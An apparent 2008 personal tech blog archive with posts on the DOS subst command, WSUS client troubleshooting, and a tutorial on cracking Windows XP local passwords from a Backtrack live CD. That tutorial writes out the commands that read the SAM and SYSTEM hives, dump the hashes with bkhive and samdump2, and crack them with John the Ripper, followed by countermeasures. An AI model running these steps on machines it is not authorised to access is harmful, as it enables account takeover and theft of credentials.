Archive for October, 2008


DOS command: subst – directory shortcut as drive

To assign a drive letter to one of your directories in Windows, for faster (shortcut) access:

subst [drive letter] [directory path]
New drive: E:\
Directory: C:\WINDOWS

subst e: c:\WINDOWS

To delete a drive created by subst:

subst [drive letter] /D

subst e: /D


Cracking WindowsXP local user password with Backtrack 3

Cracking becomes easy once the Backtrack Linux distro comes into play, and easier still when the passwords you want to crack are saved in Windows XP.

Windows XP stores its username and password information in a file named SAM at %SystemDrive%\Windows\system32\config\. The SAM file is encrypted using LM hashes, which are vulnerable to rainbow table attacks and brute-force attacks.

Insert the Backtrack 3 CD/USB and boot it live.

Once you reach the Backtrack 3 desktop, type on the console:

df   (to view the hard disk partition layout; your Windows system is usually found at /mnt/hda1, which is the partition used in this example)
cd /mnt/hda1/WINDOWS/system32/config/
bkhive system key   (see the bkhive manual)
samdump2 SAM key > ~/Desktop/password.txt   (~/Desktop/password.txt is the example location for storing the dumped password hash file)
cat ~/Desktop/password.txt

You will see the usernames and the hash values from the SAM file.

There are multiple ways to crack the hashes (John the Ripper, rainbow tables, LCP). Here, we use John the Ripper as the example.

john ~/Desktop/password.txt --users=Administrator   (Administrator is the example user name)

The user Owner has the password “abc123” and the Administrator has no password.

Countermeasures for the attack:

  • Set a boot-up password in the BIOS to prevent unauthorized live booting from CD/USB storage media.
  • Secure physical access to the machine. The cardinal rule that physical access equals total access exists for a reason.
  • Use strong passwords. A strong password means a combination of alphanumeric characters (01245…vwxyz) and symbols (!@#$%^&*()_+), at least 8 characters in length; it will take much longer to crack (sometimes it may be impossible, like the password “%a^&b*&e^$5*45*&^%<%” against a medium-size rainbow table).
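As an added example (not from the original post or its references), a small Python audit over a pwdump-style hash file like the one samdump2 writes above: it flags accounts with a blank password and accounts that still store an LM hash, and checks candidate passwords against the policy in the list above. The sample dump lines are constructed, the Owner hashes are placeholders rather than real hashes of “abc123”, and the empty-password constants are the well-known values Windows stores for a blank password.

```python
# Well-known hash values that Windows stores for an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
SYMBOLS = set("!@#$%^&*()_+")  # the symbol set from the post's policy

# Constructed sample in pwdump format (user:rid:lmhash:nthash:::); the Owner
# hashes are placeholders, not real hashes of "abc123".
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Owner:1003:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_pwdump_line(line):
    """Return (user, lm, nt) from one pwdump-style line, or None if malformed."""
    parts = line.strip().split(":")
    if len(parts) < 4 or len(parts[2]) != 32 or len(parts[3]) != 32:
        return None
    return parts[0], parts[2].lower(), parts[3].lower()


def audit_dump(text):
    """Map each account to its findings: a blank password and/or an LM hash
    still stored (the rainbow-table exposure the post describes)."""
    findings = {}
    for line in text.splitlines():
        rec = parse_pwdump_line(line)
        if rec is None:
            continue
        user, lm, nt = rec
        issues = []
        if nt == EMPTY_NT:
            issues.append("blank password")
        if lm != EMPTY_LM:
            issues.append("LM hash stored")
        findings[user] = issues
    return findings


def meets_policy(password):
    """The post's rule: at least 8 chars mixing letters, digits and symbols."""
    return (len(password) >= 8
            and any(c.isalpha() for c in password)
            and any(c.isdigit() for c in password)
            and any(c in SYMBOLS for c in password))


if __name__ == "__main__":
    for user, issues in audit_dump(SAMPLE_DUMP).items():
        print(f"{user}: {', '.join(issues) or 'ok'}")
    for pw in ("abc123", "%a^&b*&e^$5*45*&^%<%"):
        print(pw, "meets policy" if meets_policy(pw) else "too weak")
```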

Reference and credits to:

  1. Password Cracking Lab – Gary Neubauer II –
  2. Offline Windows password and Registry Editor
  3. Windows XP Menggunakan Linux Backtrack 3 beta
  4. How To: Crack Windows Passwords From SAM and SYSTEM Files, With Backtrack Installed
  5. DIY: Ripping off Windows XP using Backtrack Linux in 10 mins

WSUS client not connecting to the server – 2

Following up on the earlier post about the WSUS client, here is some additional information on this issue:

WSUS 3.0 won’t work on Windows 2000 or below; it only works on Windows 2003. For older operating systems, use WSUS 2.0, which does not require the .NET Framework.

WSUS 2.0 may require the SQL Server Desktop Engine (MSDE), a free version of the SQL Server software developed by Microsoft.

Three items are needed for WSUS 2.0:

WSUS 2.0 SP1

More information: Wikipedia: MSDE; Akadia: MSDE; Microsoft: Download MSDE

Some workarounds may be needed for WSUS clients to reconnect to the WSUS server:

Delete the SoftwareDistribution folder and the WindowsUpdate.log file from %SystemRoot%\ (the Windows directory).


WSUS client not connecting to the server

In order to save bandwidth, it is preferable to have a WSUS server at home which hosts all the Windows updates. I indeed learnt a lot in the process of making it work: installing IIS and .NET Framework 2.0, installing and configuring WSUS 3.0, synchronising, approving/declining updates, and applying them to computer groups.

The WSUS console often doesn’t work properly after a server reboot. There are three ways to tackle the problem:

1. In a command prompt, type iisreset. If it doesn’t work, reboot the server again.

2. If the problem persists, uninstall and reinstall WSUS (retain the database and all updates; it takes weeks to download these GBs of updates).

3. If uninstalling/reinstalling WSUS doesn’t help, uninstall the .NET Framework and reinstall it (of course you need to uninstall WSUS first). It won’t take many manual steps to fix the problem, only the time to watch the process run.

OK, so the server is working properly. The client may still not work! I tried to configure a desktop (call it Lousy) on my home network to subscribe to WSUS updates, as I had done on another desktop, by configuring Local Group Policy, but it didn’t work.

Basic steps to force a Windows Update check:

net stop bits
net stop wuauserv

net start bits
net start wuauserv
wuauclt /resetauthorization /detectnow

Checking the computer table on the server, Lousy is not found. There are various ways to troubleshoot this.

First, it might be a firewall problem that blocks the WSUS connection. You may need to configure your firewall to allow HTTP traffic to the server. To verify this, simply browse to your WSUS URL (http://yourwsusserver/ or http://yourwsusserver:8530). Don’t expect the WSUS web page to give you a fancy interface (by default). I got the response shown below, which shows that I can connect to the web page (but the web server refuses directory listing).

If the firewall is not the problem, then the client definitely is. You may download the WSUS Client Diagnostics Tool from Microsoft. Extract the exe file to c:\ (any location will do; c:\ is just convenient for command prompt execution). Run it in a command prompt and watch the result.
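The firewall check two paragraphs up, as an added example (not from the original post): a small Python probe that applies the author's reasoning, treating any HTTP status from the WSUS URL, including the 403 for refused directory listing, as proof the web server answered, and only a missing response as a firewall, DNS or port (80 vs 8530) problem. The local server returning 403 is a constructed stand-in for the WSUS site so the script runs offline.

```python
import http.server
import threading
import urllib.error
import urllib.request


def probe_wsus(url, timeout=5):
    """Classify a WSUS URL: ('reachable', status) when the web server answered
    at all (200, 403 'directory listing refused', 404 ...); ('blocked', why)
    when no HTTP response came back, which points at the firewall, DNS or a
    wrong port rather than at the WSUS client."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return "reachable", resp.status
    except urllib.error.HTTPError as err:
        return "reachable", err.code          # server spoke, just refused
    except (urllib.error.URLError, OSError) as err:
        return "blocked", str(getattr(err, "reason", err))


class _DenyListing(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for an IIS root that refuses directory listing."""

    def do_GET(self):
        self.send_error(403)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_fake_wsus():
    """Serve one request on a free localhost port; returns the port number."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _DenyListing)
    threading.Thread(target=srv.handle_request, daemon=True).start()
    return srv.server_address[1]


if __name__ == "__main__":
    port = start_fake_wsus()
    print(probe_wsus(f"http://127.0.0.1:{port}/"))  # ('reachable', 403)
    print(probe_wsus("http://127.0.0.1:1/"))        # ('blocked', ...)
```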

The result may show that OpenedNameService is not installed after the first check (local admin rights are needed to execute Windows Update). After researching the result, it sounds like the Windows Update client is not up to date. Thus, WindowsUpdateAgent3.0 is downloaded from the Microsoft website.

Surprisingly, the installation of WindowsUpdateAgent3.0 shows that the Windows Update Client Agent is already up to date, so the installation is not required.

I tried several methods listed in various technical forums regarding this problem, and I tried not to modify the system registry until every other solution had failed. Registry modification can be a one-way street, so be careful.

Finally, I found what works, as below:

regsvr32 /u wuaueng1.dll   (this will unregister wuauserv!)
regsvr32 wuaueng1.dll   (this will register wuauserv again)

Verify that it works:

net stop bits
net stop wuauserv

net start bits
net start wuauserv
wuauclt /resetauthorization /detectnow

Check the table on the WSUS server console: Lousy is there!

It solved my problem, but it may not solve yours. To solve your problem, remember one thing: Google is your best friend!